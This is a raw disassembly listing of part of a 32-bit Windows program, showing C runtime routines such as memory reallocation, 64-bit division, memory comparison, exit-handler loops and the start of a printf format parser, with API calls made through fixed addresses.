loc_418BC2: ; CODE XREF: sub_418AA8+CC�j
; sub_418AA8+D0�j
mov edi, [ebp+arg_C]
test edi, edi
jz short loc_418BE0
sub eax, ebx
cmp eax, esi
jnb short loc_418BD1
mov esi, eax
loc_418BD1: ; CODE XREF: sub_418AA8+125�j
push esi
push ebx
push edi
call sub_41C3DC
add esp, 0Ch
and byte ptr [esi+edi], 0
loc_418BE0: ; CODE XREF: sub_418AA8+11F�j
mov eax, [ebp+arg_10]
test eax, eax
jz short loc_418BEA
and byte ptr [eax], 0
loc_418BEA: ; CODE XREF: sub_418AA8+FC�j
; sub_418AA8+118�j ...
pop edi
pop esi
pop ebx
leave
retn
sub_418AA8 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_418BEF proc near ; CODE XREF: sub_40C56B+19�p
; sub_40DBCA+1C�p
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 20h
mov eax, [ebp+arg_0]
push esi
push [ebp+arg_C]
mov [ebp+var_18], eax
mov [ebp+var_20], eax
mov eax, [ebp+arg_4]
push [ebp+arg_8]
mov [ebp+var_1C], eax
lea eax, [ebp+var_20]
mov [ebp+var_14], 42h
push eax
call sub_419343
add esp, 0Ch
dec [ebp+var_1C]
mov esi, eax
js short loc_418C2D
mov eax, [ebp+var_20]
and byte ptr [eax], 0
jmp short loc_418C3A
; ---------------------------------------------------------------------------
loc_418C2D: ; CODE XREF: sub_418BEF+34�j
lea eax, [ebp+var_20]
push eax
push 0
call sub_41922E
pop ecx
pop ecx
loc_418C3A: ; CODE XREF: sub_418BEF+3C�j
mov eax, esi
pop esi
leave
retn
sub_418BEF endp
; =============== S U B R O U T I N E =======================================
sub_418C3F proc near ; CODE XREF: sub_40C7FB+2E�p
; sub_4200EA+ED�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push ebx
mov ebx, [esp+4+arg_0]
push ebp
push esi
test ebx, ebx
push edi
jnz short loc_418C5A
push [esp+10h+arg_4]
call sub_417BEE
pop ecx
jmp loc_418D5A
; ---------------------------------------------------------------------------
loc_418C5A: ; CODE XREF: sub_418C3F+A�j
mov esi, [esp+10h+arg_4]
test esi, esi
jnz short loc_418C70
push ebx
call sub_417C62
pop ecx
loc_418C69: ; CODE XREF: sub_418C3F+114�j
xor eax, eax
jmp loc_418D5A
; ---------------------------------------------------------------------------
loc_418C70: ; CODE XREF: sub_418C3F+21�j
; sub_418C3F+10E�j
xor edi, edi
cmp esi, 0FFFFFFE0h
ja loc_418D3B
push ebx
call sub_419C57
mov ebp, eax
pop ecx
test ebp, ebp
jz loc_418D18
cmp esi, dword_43B7BC
ja short loc_418CD8
push esi
push ebx
push ebp
call sub_41A462
add esp, 0Ch
test eax, eax
jz short loc_418CA7
mov edi, ebx
jmp short loc_418CD0
; ---------------------------------------------------------------------------
loc_418CA7: ; CODE XREF: sub_418C3F+62�j
push esi
call sub_419FAD
mov edi, eax
pop ecx
test edi, edi
jz short loc_418CD8
mov eax, [ebx-4]
dec eax
cmp eax, esi
jb short loc_418CBE
mov eax, esi
loc_418CBE: ; CODE XREF: sub_418C3F+7B�j
push eax
push ebx
push edi
call sub_417490
push ebx
push ebp
call sub_419C82
add esp, 14h
loc_418CD0: ; CODE XREF: sub_418C3F+66�j
test edi, edi
jnz loc_418D58
loc_418CD8: ; CODE XREF: sub_418C3F+53�j
; sub_418C3F+73�j
test esi, esi
jnz short loc_418CDF
push 1
pop esi
loc_418CDF: ; CODE XREF: sub_418C3F+9B�j
add esi, 0Fh
and esi, 0FFFFFFF0h
push esi
push 0
push dword_516EC0
nop
call near ptr 7C9105D4h
mov edi, eax
test edi, edi
jz short loc_418D3B
mov eax, [ebx-4]
dec eax
cmp eax, esi
jb short loc_418D04
mov eax, esi
loc_418D04: ; CODE XREF: sub_418C3F+C1�j
push eax
push ebx
push edi
call sub_417490
push ebx
push ebp
call sub_419C82
add esp, 14h
jmp short loc_418D37
; ---------------------------------------------------------------------------
loc_418D18: ; CODE XREF: sub_418C3F+47�j
test esi, esi
jnz short loc_418D1F
push 1
pop esi
loc_418D1F: ; CODE XREF: sub_418C3F+DB�j
add esi, 0Fh
and esi, 0FFFFFFF0h
push esi
push ebx
push 0
push dword_516EC0
nop
call near ptr 7C9179FDh
mov edi, eax
loc_418D37: ; CODE XREF: sub_418C3F+D7�j
test edi, edi
jnz short loc_418D58
loc_418D3B: ; CODE XREF: sub_418C3F+36�j
; sub_418C3F+B9�j
cmp dword_5158DC, 0
jz short loc_418D58
push esi
call sub_419BC2
test eax, eax
pop ecx
jnz loc_418C70
jmp loc_418C69
; ---------------------------------------------------------------------------
loc_418D58: ; CODE XREF: sub_418C3F+93�j
; sub_418C3F+FA�j ...
mov eax, edi
loc_418D5A: ; CODE XREF: sub_418C3F+16�j
; sub_418C3F+2C�j
pop edi
pop esi
pop ebp
pop ebx
retn
sub_418C3F endp
; =============== S U B R O U T I N E =======================================
sub_418D5F proc near ; CODE XREF: ___:00418F73�p
; DATA XREF: ___:off_43B578�o
call sub_418D77
call sub_41C4B6
mov dword_515880, eax
call sub_41C466
fnclex
retn
sub_418D5F endp
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_1. PRESS KEYPAD "+" TO EXPAND]
; =============== S U B R O U T I N E =======================================
sub_418D77 proc near ; CODE XREF: sub_418D5F�p
mov eax, offset sub_41C8A4
mov off_43B8CC, offset sub_41C539
mov off_43B8C8, eax
mov off_43B8D0, offset sub_41C59F
mov off_43B8D4, offset sub_41C4DF
mov off_43B8D8, offset sub_41C587
mov off_43B8DC, eax
retn
sub_418D77 endp
; =============== S U B R O U T I N E =======================================
sub_418DAF proc near ; CODE XREF: sub_40D5A0+8�p
arg_0 = dword ptr 4
arg_4 = byte ptr 8
push [esp+arg_0]
nop
call near ptr 7C81153Ch
cmp eax, 0FFFFFFFFh
jnz short loc_418DCF
nop
call near ptr 7C910331h
push eax
call sub_41C91A
pop ecx
loc_418DCB: ; CODE XREF: sub_418DAF+3F�j
or eax, 0FFFFFFFFh
retn
; ---------------------------------------------------------------------------
loc_418DCF: ; CODE XREF: sub_418DAF+D�j
test al, 1
jz short loc_418DF0
test [esp+arg_4], 2
jz short loc_418DF0
mov dword_515884, 0Dh
mov dword_515888, 5
jmp short loc_418DCB
; ---------------------------------------------------------------------------
loc_418DF0: ; CODE XREF: sub_418DAF+22�j
; sub_418DAF+29�j
xor eax, eax
retn
sub_418DAF endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_418E00 proc near ; CODE XREF: sub_40D6CA+5F�p
; sub_40D6CA+90�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
arg_C = dword ptr 10h
push edi
push esi
push ebx
xor edi, edi
mov eax, [esp+0Ch+arg_4]
or eax, eax
jge short loc_418E21
inc edi
mov edx, [esp+0Ch+arg_0]
neg eax
neg edx
sbb eax, 0
mov [esp+0Ch+arg_4], eax
mov [esp+0Ch+arg_0], edx
loc_418E21: ; CODE XREF: sub_418E00+B�j
mov eax, [esp+0Ch+arg_C]
or eax, eax
jge short loc_418E3D
inc edi
mov edx, [esp+0Ch+arg_8]
neg eax
neg edx
sbb eax, 0
mov [esp+0Ch+arg_C], eax
mov [esp+0Ch+arg_8], edx
loc_418E3D: ; CODE XREF: sub_418E00+27�j
or eax, eax
jnz short loc_418E59
mov ecx, [esp+0Ch+arg_8]
mov eax, [esp+0Ch+arg_4]
xor edx, edx
div ecx
mov ebx, eax
mov eax, [esp+0Ch+arg_0]
div ecx
mov edx, ebx
jmp short loc_418E9A
; ---------------------------------------------------------------------------
loc_418E59: ; CODE XREF: sub_418E00+3F�j
mov ebx, eax
mov ecx, [esp+0Ch+arg_8]
mov edx, [esp+0Ch+arg_4]
mov eax, [esp+0Ch+arg_0]
loc_418E67: ; CODE XREF: sub_418E00+71�j
shr ebx, 1
rcr ecx, 1
shr edx, 1
rcr eax, 1
or ebx, ebx
jnz short loc_418E67
div ecx
mov esi, eax
mul [esp+0Ch+arg_C]
mov ecx, eax
mov eax, [esp+0Ch+arg_8]
mul esi
add edx, ecx
jb short loc_418E95
cmp edx, [esp+0Ch+arg_4]
ja short loc_418E95
jb short loc_418E96
cmp eax, [esp+0Ch+arg_0]
jbe short loc_418E96
loc_418E95: ; CODE XREF: sub_418E00+85�j
; sub_418E00+8B�j
dec esi
loc_418E96: ; CODE XREF: sub_418E00+8D�j
; sub_418E00+93�j
xor edx, edx
mov eax, esi
loc_418E9A: ; CODE XREF: sub_418E00+57�j
dec edi
jnz short loc_418EA4
neg edx
neg eax
sbb edx, 0
loc_418EA4: ; CODE XREF: sub_418E00+9B�j
pop ebx
pop esi
pop edi
retn 10h
sub_418E00 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_418EB0 proc near ; CODE XREF: sub_40DA24+1D�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
mov eax, [esp+arg_8]
test eax, eax
jz short locret_418EFC
mov edx, [esp+arg_0]
push esi
push edi
mov esi, edx
mov edi, [esp+8+arg_4]
or edx, edi
and edx, 3
jz short loc_418EFD
test eax, 1
jz short loc_418EDD
mov cl, [esi]
cmp cl, [edi]
jnz short loc_418F2A
inc esi
inc edi
dec eax
jz short loc_418EFA
loc_418EDD: ; CODE XREF: sub_418EB0+20�j
; sub_418EB0+48�j
mov cl, [esi]
mov dl, [edi]
cmp cl, dl
jnz short loc_418F2A
mov cl, [esi+1]
mov dl, [edi+1]
cmp cl, dl
jnz short loc_418F2A
add edi, 2
add esi, 2
sub eax, 2
jnz short loc_418EDD
loc_418EFA: ; CODE XREF: sub_418EB0+2B�j
; sub_418EB0+84�j
pop edi
pop esi
locret_418EFC: ; CODE XREF: sub_418EB0+6�j
retn
; ---------------------------------------------------------------------------
loc_418EFD: ; CODE XREF: sub_418EB0+19�j
mov ecx, eax
and eax, 3
shr ecx, 2
jz short loc_418F32
repe cmpsd
jz short loc_418F32
mov ecx, [esi-4]
mov edx, [edi-4]
cmp cl, dl
jnz short loc_418F25
cmp ch, dh
jnz short loc_418F25
shr ecx, 10h
shr edx, 10h
cmp cl, dl
jnz short loc_418F25
cmp ch, dh
loc_418F25: ; CODE XREF: sub_418EB0+63�j
; sub_418EB0+67�j ...
mov eax, 0
loc_418F2A: ; CODE XREF: sub_418EB0+26�j
; sub_418EB0+33�j ...
sbb eax, eax
pop edi
sbb eax, 0FFFFFFFFh
pop esi
retn
; ---------------------------------------------------------------------------
loc_418F32: ; CODE XREF: sub_418EB0+55�j
; sub_418EB0+59�j
test eax, eax
jz short loc_418EFA
mov edx, [esi]
mov ecx, [edi]
cmp dl, cl
jnz short loc_418F25
dec eax
jz short loc_418F59
cmp dh, ch
jnz short loc_418F25
dec eax
jz short loc_418F59
and ecx, 0FF0000h
and edx, 0FF0000h
cmp edx, ecx
jnz short loc_418F25
dec eax
loc_418F59: ; CODE XREF: sub_418EB0+8F�j
; sub_418EB0+96�j
pop edi
pop esi
retn
sub_418EB0 endp
; =============== S U B R O U T I N E =======================================
sub_418F5C proc near ; CODE XREF: sub_40E14E+3F�p
; sub_40E220+27�p
arg_0 = dword ptr 4
push 1
push [esp+4+arg_0]
call sub_417C00
pop ecx
pop ecx
retn
sub_418F5C endp
; ---------------------------------------------------------------------------
mov eax, off_43B578
test eax, eax
jz short loc_418F75
call eax ; sub_418D5F
loc_418F75: ; CODE XREF: ___:00418F71�j
push offset dword_423018
push offset dword_42300C
call sub_419052
push offset dword_423008
push offset dword_423000
call sub_419052
add esp, 10h
retn
; ---------------------------------------------------------------------------
push 0
push 0
push dword ptr [esp+0Ch]
call sub_418FB9
add esp, 0Ch
retn
; =============== S U B R O U T I N E =======================================
sub_418FA8 proc near ; CODE XREF: sub_4191E5+1C�p
; DATA XREF: ___:off_43B590�o
arg_0 = dword ptr 4
push 0
push 1
push [esp+8+arg_0]
call sub_418FB9
add esp, 0Ch
retn
sub_418FA8 endp
; =============== S U B R O U T I N E =======================================
sub_418FB9 proc near ; CODE XREF: ___:00418F9F�p
; sub_418FA8+8�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
push edi
push 1
pop edi
cmp dword_5158CC, edi
jnz short loc_418FD6
push [esp+4+arg_0]
nop
call near ptr 7C80DDF5h
push eax
nop
call near ptr 7C801E16h
loc_418FD6: ; CODE XREF: sub_418FB9+A�j
cmp [esp+4+arg_4], 0
push ebx
mov ebx, [esp+8+arg_8]
mov dword_5158C8, edi
mov byte_5158C4, bl
jnz short loc_41902A
mov eax, dword_516ED4
test eax, eax
jz short loc_419019
mov ecx, dword_516ED0
push esi
lea esi, [ecx-4]
cmp esi, eax
jb short loc_419018
loc_419005: ; CODE XREF: sub_418FB9+5D�j
mov eax, [esi]
test eax, eax
jz short loc_41900D
call eax
loc_41900D: ; CODE XREF: sub_418FB9+50�j
sub esi, 4
cmp esi, dword_516ED4
jnb short loc_419005
loc_419018: ; CODE XREF: sub_418FB9+4A�j
pop esi
loc_419019: ; CODE XREF: sub_418FB9+3C�j
push offset dword_423024
push offset dword_42301C
call sub_419052
pop ecx
pop ecx
loc_41902A: ; CODE XREF: sub_418FB9+33�j
push offset dword_42302C
push offset dword_423028
call sub_419052
pop ecx
pop ecx
test ebx, ebx
pop ebx
jnz short loc_419050
push [esp+4+arg_0]
mov dword_5158CC, edi
nop
call near ptr 7C81CDDAh
loc_419050: ; CODE XREF: sub_418FB9+85�j
pop edi
retn
sub_418FB9 endp
; =============== S U B R O U T I N E =======================================
sub_419052 proc near ; CODE XREF: ___:00418F7F�p
; ___:00418F8E�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push esi
mov esi, [esp+4+arg_0]
loc_419057: ; CODE XREF: sub_419052+16�j
cmp esi, [esp+4+arg_4]
jnb short loc_41906A
mov eax, [esi]
test eax, eax
jz short loc_419065
call eax
loc_419065: ; CODE XREF: sub_419052+F�j
add esi, 4
jmp short loc_419057
; ---------------------------------------------------------------------------
loc_41906A: ; CODE XREF: sub_419052+9�j
pop esi
retn
sub_419052 endp
; =============== S U B R O U T I N E =======================================
sub_41906C proc near ; CODE XREF: sub_40F6F1+2CBC�p
arg_0 = dword ptr 4
push [esp+arg_0]
nop
call near ptr 7C831EABh
test eax, eax
jnz short loc_419082
nop
call near ptr 7C910331h
jmp short loc_419084
; ---------------------------------------------------------------------------
loc_419082: ; CODE XREF: sub_41906C+C�j
xor eax, eax
loc_419084: ; CODE XREF: sub_41906C+14�j
test eax, eax
jz short loc_419093
push eax
call sub_41C91A
pop ecx
or eax, 0FFFFFFFFh
retn
; ---------------------------------------------------------------------------
loc_419093: ; CODE XREF: sub_41906C+1A�j
xor eax, eax
retn
sub_41906C endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_419096 proc near ; CODE XREF: sub_40F6F1+2C13�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = byte ptr 10h
push ebp
mov ebp, esp
push esi
push edi
push [ebp+arg_0]
call sub_41C981
mov esi, eax
lea eax, [ebp+arg_8]
push eax
push [ebp+arg_4]
push [ebp+arg_0]
call sub_419343
push [ebp+arg_0]
mov edi, eax
push esi
call sub_41CA0E
add esp, 18h
mov eax, edi
pop edi
pop esi
pop ebp
retn
sub_419096 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4190C8 proc near ; CODE XREF: sub_415EF7+24�p
var_C = qword ptr -0Ch
var_4 = word ptr -4
var_2 = word ptr -2
push ebp
mov ebp, esp
add esp, 0FFFFFFF4h
fstcw [ebp+var_2]
wait
mov ax, [ebp+var_2]
or ah, 0Ch
mov [ebp+var_4], ax
fldcw [ebp+var_4]
fistp [ebp+var_C]
fldcw [ebp+var_2]
mov eax, dword ptr [ebp+var_C]
mov edx, dword ptr [ebp+var_C+4]
leave
retn
sub_4190C8 endp
; ---------------------------------------------------------------------------
db 0E1h
dd 22A560DCh, 60B2888h, 0CD819B71h, 6B8D8548h, 9F52448Eh
dd 25896450h, 0
dd 5358EC83h, 65895756h, 0BFE890E8h, 337C3F80h, 89D48AD2h
dd 51589C15h, 81C88B00h, 0FFE1h, 980D8900h, 0C1005158h
dd 0CA0308E1h, 58940D89h, 0E8C10051h, 5890A310h, 0F6330051h
dd 0A8FE856h, 85590000h, 6A0875C0h, 0B0E81Ch, 89590000h
dd 0FCE8FC75h, 9000003Eh, 3F9DB4E8h, 6EC4A37Ch, 0BAE80051h
dd 0A300003Dh, 5158D0h, 3B63E8h, 3AA5E800h, 0E3E80000h
dd 89FFFFFDh, 458DD075h, 0E89050A4h, 7C3E8D5Ah, 3A36E8h
dd 9C458900h, 1D045F6h, 0B70F0674h, 3EBD445h, 50580A6Ah
dd 569C75FFh, 0EAE89056h, 507C3F24h, 0FF5A6EE8h, 0A04589FFh
dd 0FDD1E850h, 458BFFFFh, 8B088BECh, 984D8909h, 74E85150h
dd 59000038h, 658BC359h, 9875FFE8h, 0FFFDC3E8h
db 0FFh
; =============== S U B R O U T I N E =======================================
sub_4191E5 proc near ; CODE XREF: ___:0041CC75�p
; ___:0041CCA4�p ...
arg_0 = dword ptr 4
cmp dword_5158D8, 1
jnz short loc_4191F3
call sub_41D3DC
loc_4191F3: ; CODE XREF: sub_4191E5+7�j
push [esp+arg_0]
call sub_41D415
push 0FFh
call off_43B590
pop ecx
pop ecx
retn
sub_4191E5 endp
; ---------------------------------------------------------------------------
dw 3D83h
dd offset dword_5158D8
dd 0E8057501h, 41C4h, 42474FFh, 41F4E8h, 0FF685900h, 90000000h
dd 403BADE8h
db 7Ch, 0C3h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41922E proc near ; CODE XREF: sub_4173AC+46�p
; sub_41792A+45�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ebx
push esi
mov esi, [ebp+arg_4]
mov eax, [esi+0Ch]
mov ebx, [esi+10h]
test al, 82h
jz loc_419337
test al, 40h
jnz loc_419337
test al, 1
jz short loc_419266
and dword ptr [esi+4], 0
test al, 10h
jz loc_419337
mov ecx, [esi+8]
and al, 0FEh
mov [esi], ecx
mov [esi+0Ch], eax
loc_419266: ; CODE XREF: sub_41922E+20�j
mov eax, [esi+0Ch]
and dword ptr [esi+4], 0
and [ebp+arg_4], 0
and al, 0EFh
or al, 2
test ax, 10Ch
mov [esi+0Ch], eax
jnz short loc_4192A0
cmp esi, offset dword_43BB98
jz short loc_41928E
cmp esi, offset dword_43BBB8
jnz short loc_419299
loc_41928E: ; CODE XREF: sub_41922E+56�j
push ebx
call sub_41D5AC
test eax, eax
pop ecx
jnz short loc_4192A0
loc_419299: ; CODE XREF: sub_41922E+5E�j
push esi
call sub_41D568
pop ecx
loc_4192A0: ; CODE XREF: sub_41922E+4E�j
; sub_41922E+69�j
test word ptr [esi+0Ch], 108h
push edi
jz short loc_41930D
mov eax, [esi+8]
mov edi, [esi]
sub edi, eax
lea ecx, [eax+1]
mov [esi], ecx
mov ecx, [esi+18h]
dec ecx
test edi, edi
mov [esi+4], ecx
jle short loc_4192D0
push edi
push eax
push ebx
call sub_41BE4F
add esp, 0Ch
mov [ebp+arg_4], eax
jmp short loc_419303
; ---------------------------------------------------------------------------
loc_4192D0: ; CODE XREF: sub_41922E+90�j
cmp ebx, 0FFFFFFFFh
jz short loc_4192EB
mov eax, ebx
mov ecx, ebx
sar eax, 5
and ecx, 1Fh
mov eax, dword_516B80[eax*4]
lea eax, [eax+ecx*8]
jmp short loc_4192F0
; ---------------------------------------------------------------------------
loc_4192EB: ; CODE XREF: sub_41922E+A5�j
mov eax, offset dword_43BAD0
loc_4192F0: ; CODE XREF: sub_41922E+BB�j
test byte ptr [eax+4], 20h
jz short loc_419303
push 2
push 0
push ebx
call sub_41BA39
add esp, 0Ch
loc_419303: ; CODE XREF: sub_41922E+A0�j
; sub_41922E+C6�j
mov eax, [esi+8]
mov cl, byte ptr [ebp+arg_0]
mov [eax], cl
jmp short loc_419321
; ---------------------------------------------------------------------------
loc_41930D: ; CODE XREF: sub_41922E+79�j
push 1
lea eax, [ebp+arg_0]
pop edi
push edi
push eax
push ebx
call sub_41BE4F
add esp, 0Ch
mov [ebp+arg_4], eax
loc_419321: ; CODE XREF: sub_41922E+DD�j
cmp [ebp+arg_4], edi
pop edi
jz short loc_41932D
or dword ptr [esi+0Ch], 20h
jmp short loc_41933C
; ---------------------------------------------------------------------------
loc_41932D: ; CODE XREF: sub_41922E+F7�j
mov eax, [ebp+arg_0]
and eax, 0FFh
jmp short loc_41933F
; ---------------------------------------------------------------------------
loc_419337: ; CODE XREF: sub_41922E+10�j
; sub_41922E+18�j ...
or al, 20h
mov [esi+0Ch], eax
loc_41933C: ; CODE XREF: sub_41922E+FD�j
or eax, 0FFFFFFFFh
loc_41933F: ; CODE XREF: sub_41922E+107�j
pop esi
pop ebx
pop ebp
retn
sub_41922E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_419343 proc near ; CODE XREF: sub_4173AC+29�p
; sub_41792A+28�p ...
var_248 = byte ptr -248h
var_247 = byte ptr -247h
var_49 = byte ptr -49h
var_48 = dword ptr -48h
var_44 = dword ptr -44h
var_40 = dword ptr -40h
var_3C = dword ptr -3Ch
var_38 = byte ptr -38h
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_16 = byte ptr -16h
var_15 = byte ptr -15h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 248h
push ebx
push esi
push edi
mov edi, [ebp+arg_4]
xor esi, esi
mov bl, [edi]
inc edi
test bl, bl
mov [ebp+var_C], esi
mov [ebp+var_14], esi
mov [ebp+arg_4], edi
jz loc_419A5C
mov ecx, [ebp+var_10]
xor edx, edx
jmp short loc_419377
; ---------------------------------------------------------------------------
loc_41936F: ; CODE XREF: sub_419343+713�j
mov ecx, [ebp+var_10]
mov esi, [ebp+var_30]
xor edx, edx
loc_419377: ; CODE XREF: sub_419343+2A�j
cmp [ebp+var_14], edx
jl loc_419A5C
cmp bl, 20h
jl short loc_419398
cmp bl, 78h
jg short loc_419398
movsx eax, bl
mov al, byte_42160C[eax]
and eax, 0Fh
jmp short loc_41939A
; ---------------------------------------------------------------------------
loc_419398: ; CODE XREF: sub_419343+40�j
; sub_419343+45�j
xor eax, eax
loc_41939A: ; CODE XREF: sub_419343+53�j
movsx eax, byte_42162C[esi+eax*8]
sar eax, 4
cmp eax, 7 ; switch 8 cases
mov [ebp+var_30], eax
ja loc_419A4B ; default
jmp off_419A64[eax*4] ; switch jump
loc_4193B8: ; DATA XREF: ___:off_419A64�o
or [ebp+var_10], 0FFFFFFFFh ; jumptable 004193B1 case 1
mov [ebp+var_34], edx
mov [ebp+var_28], edx
mov [ebp+var_20], edx
mov [ebp+var_1C], edx
mov [ebp+var_4], edx
mov [ebp+var_24], edx
jmp loc_419A4B ; default
; ---------------------------------------------------------------------------
loc_4193D3: ; CODE XREF: sub_419343+6E�j
; DATA XREF: ___:off_419A64�o
movsx eax, bl ; jumptable 004193B1 case 2
sub eax, 20h
jz short loc_419416
sub eax, 3
jz short loc_41940D
sub eax, 8
jz short loc_419404
dec eax
dec eax
jz short loc_4193FB
sub eax, 3
jnz loc_419A4B ; default
or [ebp+var_4], 8
jmp loc_419A4B ; default
; ---------------------------------------------------------------------------
loc_4193FB: ; CODE XREF: sub_419343+A4�j
or [ebp+var_4], 4
jmp loc_419A4B ; default
; ---------------------------------------------------------------------------
loc_419404: ; CODE XREF: sub_419343+A0�j
or [ebp+var_4], 1
jmp loc_419A4B ; default
; ---------------------------------------------------------------------------
loc_41940D: ; CODE XREF: sub_419343+9B�j
or byte ptr [ebp+var_4], 80h
jmp loc_419A4B ; default
; ---------------------------------------------------------------------------
loc_419416: ; CODE XREF: sub_419343+96�j
or [ebp+var_4], 2
jmp loc_419A4B ; default
; ---------------------------------------------------------------------------
loc_41941F: ; CODE XREF: sub_419343+6E�j
; DATA XREF: ___:off_419A64�o
cmp bl, 2Ah ; jumptable 004193B1 case 3
jnz short loc_419447
lea eax, [ebp+arg_8]
push eax
call sub_419B22
test eax, eax
pop ecx
mov [ebp+var_20], eax
jge loc_419A4B ; default
or [ebp+var_4], 4
neg eax
loc_41943F: ; CODE XREF: sub_419343+111�j
mov [ebp+var_20], eax
jmp loc_419A4B ; default
; ---------------------------------------------------------------------------
loc_419447: ; CODE XREF: sub_419343+DF�j
mov eax, [ebp+var_20]
movsx ecx, bl
lea eax, [eax+eax*4]
lea eax, [ecx+eax*2-30h]
jmp short loc_41943F
; ---------------------------------------------------------------------------
loc_419456: ; CODE XREF: sub_419343+6E�j
; DATA XREF: ___:off_419A64�o
mov [ebp+var_10], edx ; jumptable 004193B1 case 4
jmp loc_419A4B ; default
; ---------------------------------------------------------------------------
loc_41945E: ; CODE XREF: sub_419343+6E�j
; DATA XREF: ___:off_419A64�o
cmp bl, 2Ah ; jumptable 004193B1 case 5
jnz short loc_419481
lea eax, [ebp+arg_8]
push eax
call sub_419B22
test eax, eax
pop ecx
mov [ebp+var_10], eax
jge loc_419A4B ; default
or [ebp+var_10], 0FFFFFFFFh
jmp loc_419A4B ; default
; ---------------------------------------------------------------------------
loc_419481: ; CODE XREF: sub_419343+11E�j
lea eax, [ecx+ecx*4]
movsx ecx, bl
lea eax, [ecx+eax*2-30h]
mov [ebp+var_10], eax
jmp loc_419A4B ; default
; ---------------------------------------------------------------------------
loc_419493: ; CODE XREF: sub_419343+6E�j
; DATA XREF: ___:off_419A64�o
cmp bl, 49h ; jumptable 004193B1 case 6
jz short loc_4194C6
cmp bl, 68h
jz short loc_4194BD
cmp bl, 6Ch
jz short loc_4194B4
cmp bl, 77h
jnz loc_419A4B ; default
or byte ptr [ebp+var_4+1], 8
jmp loc_419A4B ; default
; ---------------------------------------------------------------------------
loc_4194B4: ; CODE XREF: sub_419343+15D�j
or [ebp+var_4], 10h
jmp loc_419A4B ; default
; ---------------------------------------------------------------------------
loc_4194BD: ; CODE XREF: sub_419343+158�j
or [ebp+var_4], 20h
jmp loc_419A4B ; default
; ---------------------------------------------------------------------------
loc_4194C6: ; CODE XREF: sub_419343+153�j
cmp byte ptr [edi], 36h
jnz short loc_4194DF
cmp byte ptr [edi+1], 34h
jnz short loc_4194DF
inc edi
inc edi
or byte ptr [ebp+var_4+1], 80h
mov [ebp+arg_4], edi
jmp loc_419A4B ; default
; ---------------------------------------------------------------------------
loc_4194DF: ; CODE XREF: sub_419343+186�j
; sub_419343+18C�j
mov [ebp+var_30], edx
loc_4194E2: ; CODE XREF: sub_419343+6E�j
; DATA XREF: ___:off_419A64�o
mov ecx, off_43B5A0 ; jumptable 004193B1 case 0
mov [ebp+var_24], edx
movzx eax, bl
test byte ptr [ecx+eax*2+1], 80h
jz short loc_41950E
lea eax, [ebp+var_14]
push eax
push [ebp+arg_0]
movsx eax, bl
push eax
call sub_419A84
mov bl, [edi]
add esp, 0Ch
inc edi
mov [ebp+arg_4], edi
loc_41950E: ; CODE XREF: sub_419343+1B0�j
lea eax, [ebp+var_14]
push eax
push [ebp+arg_0]
movsx eax, bl
push eax
call sub_419A84
add esp, 0Ch
jmp loc_419A4B ; default
; ---------------------------------------------------------------------------
loc_419526: ; CODE XREF: sub_419343+6E�j
; DATA XREF: ___:off_419A64�o
movsx eax, bl ; jumptable 004193B1 case 7
cmp eax, 67h
jg loc_41974E
cmp eax, 65h
jge loc_4195D1
cmp eax, 58h
jg loc_41962F
jz loc_4197C2
sub eax, 43h
jz loc_4195F2
dec eax
dec eax
jz short loc_4195C7
dec eax
dec eax
jz short loc_4195C7
sub eax, 0Ch
jnz loc_41994D
test word ptr [ebp+var_4], 830h
jnz short loc_419570
or byte ptr [ebp+var_4+1], 8
loc_419570: ; CODE XREF: sub_419343+227�j
; sub_419343+42A�j
mov esi, [ebp+var_10]
cmp esi, 0FFFFFFFFh
jnz short loc_41957D
mov esi, 7FFFFFFFh
loc_41957D: ; CODE XREF: sub_419343+233�j
lea eax, [ebp+arg_8]
push eax
call sub_419B22
test word ptr [ebp+var_4], 810h
pop ecx
mov ecx, eax
mov [ebp+var_8], ecx
jz loc_419796
test ecx, ecx
jnz short loc_4195A5
mov ecx, off_43B59C
mov [ebp+var_8], ecx
loc_4195A5: ; CODE XREF: sub_419343+257�j
mov [ebp+var_24], 1
mov eax, ecx
loc_4195AE: ; CODE XREF: sub_419343+282�j
mov edx, esi
dec esi
test edx, edx
jz loc_41978D
cmp word ptr [eax], 0
jz loc_41978D
inc eax
inc eax
jmp short loc_4195AE
; ---------------------------------------------------------------------------
loc_4195C7: ; CODE XREF: sub_419343+212�j
; sub_419343+216�j
mov [ebp+var_34], 1
add bl, 20h
loc_4195D1: ; CODE XREF: sub_419343+1F2�j
or [ebp+var_4], 40h
lea edi, [ebp+var_248]
cmp ecx, edx
mov [ebp+var_8], edi
jge loc_4196B5
mov [ebp+var_10], 6
jmp loc_4196C3
; ---------------------------------------------------------------------------
loc_4195F2: ; CODE XREF: sub_419343+20A�j
test word ptr [ebp+var_4], 830h
jnz short loc_4195FE
